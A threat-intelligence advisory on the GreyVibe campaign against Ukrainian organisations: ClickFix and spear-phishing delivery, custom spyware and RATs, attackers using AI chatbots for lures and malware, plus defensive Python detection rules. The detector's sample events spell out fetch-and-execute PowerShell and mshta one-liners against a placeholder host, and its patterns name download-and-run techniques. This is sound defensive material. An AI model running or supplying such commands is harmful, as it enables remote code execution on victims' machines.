GreyVibe Targets Ukraine with AI-Generated Lures and Custom Malware
The likely Russian-aligned GreyVibe group is targeting Ukrainian organizations with AI-generated lures delivered via spear-phishing and malicious websites, deploying custom malware such as PhantomRelay, LegionRelay, and FallSpy to exfiltrate sensitive data.
The GreyVibe threat group, assessed to be Russian-aligned, has targeted Ukrainian entities since at least August 2025. WithSecure discovered the campaign in January 2026 and reported that GreyVibe uses AI tools such as ChatGPT, Ideogram AI, and Google Gemini to generate realistic lures for its cyberespionage operations. Targets include military, government, civilian, and business organizations in Ukraine, as well as organizations with ties to Ukraine. GreyVibe runs several attack chains, including spear-phishing (PhantomMail), fake CAPTCHA pages (PhantomClick), and malicious websites (PrincessClub, DroneLink, Nebo), to deliver custom malware such as PhantomRelay, LegionRelay, and FallSpy. The group also uses AI assistance to develop malware obfuscators and remote access trojans (RATs).
Attack Chain
- Initial Access (PhantomMail): GreyVibe sends spear-phishing emails to Ukrainian targets using Google Drive and 4sync links, delivering malicious ZIP/RAR archives.
- Deception: Victims are shown decoy PDF documents or fake error messages so that the execution of the malicious payload goes unnoticed.
- Execution (PhantomClick): Victims are redirected to fake CAPTCHA or ClickFix pages disguised as Zoom or LAPAS sites.
- Command Execution: Under the guise of a Cloudflare verification prompt, targets are instructed to copy and run a command themselves; that command infects their own machine.
- Malware Installation (PrincessClub, DroneLink): Victims visiting fake Ukrainian adult/dating websites or Ukrainian military charity websites are infected with FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware.
- Data Collection (FallSpy, LegionRelay): FallSpy collects contact lists, call logs, device/network information, location data, media files, and SIM information. LegionRelay supports file theft, screenshot capturing, browser credential theft, Telegram/WhatsApp data exfiltration, and RDP access setup.
- Command and Control (PhantomRelay): PhantomRelay establishes command and control, enabling system fingerprinting, dynamic script loading, and PowerShell and Windows command execution.
- Exfiltration: Stolen data is exfiltrated to attacker-controlled servers, supporting cyberespionage objectives.
Impact
GreyVibe’s cyberespionage campaign targets Ukrainian military, government, civilian, and business sectors to gather intelligence aligned with potential Russian interests. Successful attacks can lead to the compromise of sensitive data, including personal information, military communications, and business intelligence, potentially harming national security and economic stability. The use of AI-generated lures enhances the credibility of phishing campaigns, increasing the likelihood of successful breaches. While the precise number of victims is unknown, the ongoing nature of the campaign and the breadth of targeted sectors indicate a significant and persistent threat.
Recommendation
- Deploy a Sigma rule that detects the execution of commands users run in response to fake Cloudflare verification prompts (PhantomClick); see the "Fake Cloudflare Verification Prompt" rule under Detection coverage.
- Monitor for PowerShell processes that open outbound network connections, which can indicate PhantomRelay or LegionRelay command-and-control or exfiltration activity; see the "Suspicious PowerShell Network Connection" rule under Detection coverage.
- Configure endpoint detection and response (EDR) to detect and block PhantomRelay and LegionRelay, with particular attention to PowerShell scripts that collect and exfiltrate data.
- Educate users about spear-phishing tactics, especially those using AI-generated lures that impersonate Ukrainian government, emergency, telecom, and energy entities (PhantomMail).
- Enforce multi-factor authentication (MFA) on all critical systems so that browser credentials stolen by LegionRelay cannot be used on their own.
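As an added example (this is not the platform's Sigma rules and not GreyVibe tooling), the following Python implements the two detection ideas from the recommendations above and runs them over constructed Sysmon-style events. Assumptions: the ClickFix command is launched as a direct child of explorer.exe (the usual paste-into-Run-dialog flow), the command-line markers and the internal address ranges are illustrative, and the sample hosts and addresses use the reserved .invalid TLD and the TEST-NET-3 range, so nothing in the sample data is a real indicator.

```python
"""Added example: the two recommended detections as plain Python, not Sigma.

Rule 1 (PhantomClick / fake Cloudflare prompt): a script interpreter or LOLBin
spawned directly by explorer.exe with a command line that downloads or decodes
something. The parent-process assumption mirrors the usual ClickFix flow.

Rule 2 (PhantomRelay / LegionRelay): powershell.exe opening a connection to an
address outside the internal ranges and not on an allowlist.
"""
import ipaddress
import re
from dataclasses import dataclass

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line markers typical of pasted one-liners (assumed, tune locally).
SUSPICIOUS_CMDLINE = [
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring)\b", re.I),
    re.compile(r"\bmshta\b.*https?://", re.I),
    re.compile(r"\b(?:curl|bitsadmin)\b.*https?://", re.I),
]

# Internal ranges: RFC 1918 plus loopback (assumption; extend for your network).
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 (process creation)."""
    image: str
    parent_image: str
    command_line: str


@dataclass
class NetworkEvent:
    """Subset of Sysmon Event ID 3 (network connection)."""
    image: str
    dest_ip: str
    dest_port: int


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_fake_verification_prompt(ev: ProcessEvent) -> bool:
    """High: interpreter launched from explorer.exe with a download/decode marker."""
    if basename(ev.image) not in INTERPRETERS:
        return False
    if basename(ev.parent_image) != "explorer.exe":
        return False
    return any(p.search(ev.command_line) for p in SUSPICIOUS_CMDLINE)


def is_suspicious_powershell_connection(ev: NetworkEvent, allowlist=frozenset()) -> bool:
    """Medium: PowerShell connecting outside internal ranges and the allowlist."""
    if basename(ev.image) not in POWERSHELL:
        return False
    if ev.dest_ip in allowlist:
        return False
    addr = ipaddress.ip_address(ev.dest_ip)
    return not any(addr in net for net in PRIVATE_NETS)


def run_detections(events, allowlist=frozenset()):
    """Return (rule_name, severity, event) for every event that matches a rule."""
    alerts = []
    for ev in events:
        if isinstance(ev, ProcessEvent) and is_fake_verification_prompt(ev):
            alerts.append(("Fake Cloudflare Verification Prompt", "high", ev))
        elif isinstance(ev, NetworkEvent) and is_suspicious_powershell_connection(ev, allowlist):
            alerts.append(("Suspicious PowerShell Network Connection", "medium", ev))
    return alerts


# Constructed sample telemetry: .invalid hostnames and TEST-NET-3 addresses only.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(PS, r"C:\Windows\explorer.exe",
                 'powershell -w hidden -c "iwr https://cf-verify.example.invalid/c.ps1 | iex"'),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta https://cf-verify.example.invalid/v.hta"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd /c dir"),
    ProcessEvent(PS, r"C:\Program Files\Example\build.exe", "powershell -NoProfile -File build.ps1"),
    NetworkEvent(PS, "203.0.113.45", 443),        # stands in for a public C2 address
    NetworkEvent(PS, "10.0.0.5", 5985),           # internal WinRM, not flagged
    NetworkEvent(r"C:\Program Files\Browser\browser.exe", "203.0.113.45", 443),
]

if __name__ == "__main__":
    for rule, severity, ev in run_detections(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {ev}")
```

The first rule deliberately requires the explorer.exe parent: that keeps it quiet on build servers and admin scripts while still catching the paste-and-run flow, at the cost of missing the same one-liner launched from another parent. The second rule is noisy on its own, which is why it is rated medium; an allowlist of known update and management endpoints is the first tuning step.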
Detection coverage (2 rules)
Fake Cloudflare Verification Prompt
Severity: high. Detects execution of commands that victims run themselves in response to fake Cloudflare verification prompts (PhantomClick).
Suspicious PowerShell Network Connection
Severity: medium. Detects PowerShell scripts making network connections, indicative of potential data exfiltration or C2 activity associated with PhantomRelay or LegionRelay.